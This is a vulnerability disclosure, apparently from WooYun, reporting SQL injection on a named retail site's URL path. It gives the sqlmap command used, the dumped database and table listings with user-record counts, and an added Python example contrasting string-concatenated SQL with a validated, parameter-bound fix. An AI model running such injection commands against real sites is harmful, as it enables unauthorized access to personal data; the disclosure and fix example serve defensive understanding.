SQL injection on the aituan.com main site (could expose user records numbering in the millions)

Vulnerability details

Disclosure status:

2014-03-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-05-14: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

With the guitar from "Song of the Highway" playing, here I come...

Detailed description:

Thanks to a friendly link on another site for speeding up my arrival at aituan.

#1 Injection point

http://www.aituan.com/duobao/1547

Detection type: see sql_1.png (screenshot)

#2 Feeling lazy, just let sqlmap run

sqlmap -u "http://www.aituan.com/duobao/1547*" --dbms="mysql" --time-sec=2 --ignore-proxy --current-user --current-db

(The trailing `*` marks the injection point inside the URL path, since there is no query-string parameter to inject into; `--time-sec=2` sets the delay sqlmap expects from time-based blind payloads, and `--dbms="mysql"` skips fingerprinting of other back-ends.)

sql_2.png (screenshot)

Proof of vulnerability:

Database: aituan_test
[28 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_admin_log |
| at_collect |
| at_config |
| at_feedback |
| at_gift |
| at_gift_consume |
| at_indiana |
| at_indiana_order |
| at_links |
| at_match |
| at_product |
| at_product_attribute |
| at_product_category |
| at_product_count |
| at_product_hits |
| at_product_style |
| at_seller |
| at_seller_count |
| at_seller_notice |
| at_user |
| at_user_address |
| at_user_details |
| at_user_product |
| at_user_score |
| at_user_ticket |
| at_user_verify |
+---------------------------------------+

Database: aituan
[58 tables]
+---------------------------------------+
| at_ad |
| at_admin |
| at_test |
| at_user |

...omitted

Database: aituan1515
[83 tables]
+---------------------------------------+
| at_activity_guanggao |
| at_activity_visit |
| at_admin |

...omitted

Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |

...omitted

Database: test
[1 table]
+---------------------------------------+
| at_double_count |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |

...omitted

Row counts for the aituan database:

Database: aituan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| at_indiana_order | 1390489 |
| at_user_score | 1381200 |
| at_user | 664522 |
| at_user_score_spend | 511283 |
...omitted

This was only a test; not a single row of data was touched.

Fix recommendation:

Never mind anything else, pick up your keyboard and patch this right away :)
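The finding above is a numeric id taken from the URL path (/duobao/1547) and spliced into a MySQL query, which is why sqlmap could inject without any quote character. The following is an added example written for this page, not code from aituan.com or from the original report: it reconstructs that anti-pattern against a constructed in-memory SQLite table (the column names are assumptions; only the table name at_product comes from the report) and puts the hardened handler beside it. Boolean payloads are used because SQLite has no SLEEP(); against MySQL the same splice would also accept the time-based payloads sqlmap relies on.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for at_product (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE at_product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)"
    )
    conn.executemany(
        "INSERT INTO at_product VALUES (?, ?, ?)",
        [(1547, "sample item A", 100), (1548, "sample item B", 200), (1549, "sample item C", 300)],
    )
    return conn


def lookup_vulnerable(conn, path_id):
    """Anti-pattern implied by the report: the last path segment of
    /duobao/<id> is concatenated straight into the SQL text. Because the
    value is numeric, no quote is needed to break out of it."""
    sql = "SELECT id, name FROM at_product WHERE id = " + path_id
    return conn.execute(sql).fetchall()


# Accept only a short run of decimal digits; everything else is rejected
# before any SQL is built (the length cap is an assumed sanity limit).
_ID_RE = re.compile(r"[0-9]{1,10}")


def lookup_safe(conn, path_id):
    """Hardened handler: validate the segment as an integer, then bind it
    as a parameter so the driver never interprets it as SQL."""
    if not _ID_RE.fullmatch(path_id):
        raise ValueError("bad product id")
    return conn.execute(
        "SELECT id, name FROM at_product WHERE id = ?", (int(path_id),)
    ).fetchall()


def safe_rejects(conn, path_id):
    """True if the hardened handler refuses the value outright."""
    try:
        lookup_safe(conn, path_id)
    except ValueError:
        return True
    return False


def demo():
    conn = make_db()
    # Payloads a tester would send in place of "1547" in the path.
    # (MySQL time-based equivalent, not runnable on SQLite: "1547 AND SLEEP(2)")
    probes = ["1547", "1547 OR 1=1", "1547 AND 1=2"]
    return {
        p: {
            "vulnerable_rows": len(lookup_vulnerable(conn, p)),
            "safe_rejected": safe_rejects(conn, p),
        }
        for p in probes
    }


if __name__ == "__main__":
    for probe, result in demo().items():
        print(f"{probe!r}: {result}")
```

In the vulnerable handler the probe `1547 OR 1=1` returns every row and `1547 AND 1=2` returns none, which is exactly the true/false oracle sqlmap's boolean-based and time-based blind modes build on; the hardened handler rejects both before touching the database, and a legitimate id still works through the bound parameter. Applying the same validate-then-bind pattern to every path and query parameter on the site is the actual fix.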

Copyright notice: when reposting, credit the source Comer@WooYun


Vulnerability response

Vendor response:

Could not reach the vendor, or the vendor explicitly declined


Vulnerability rating: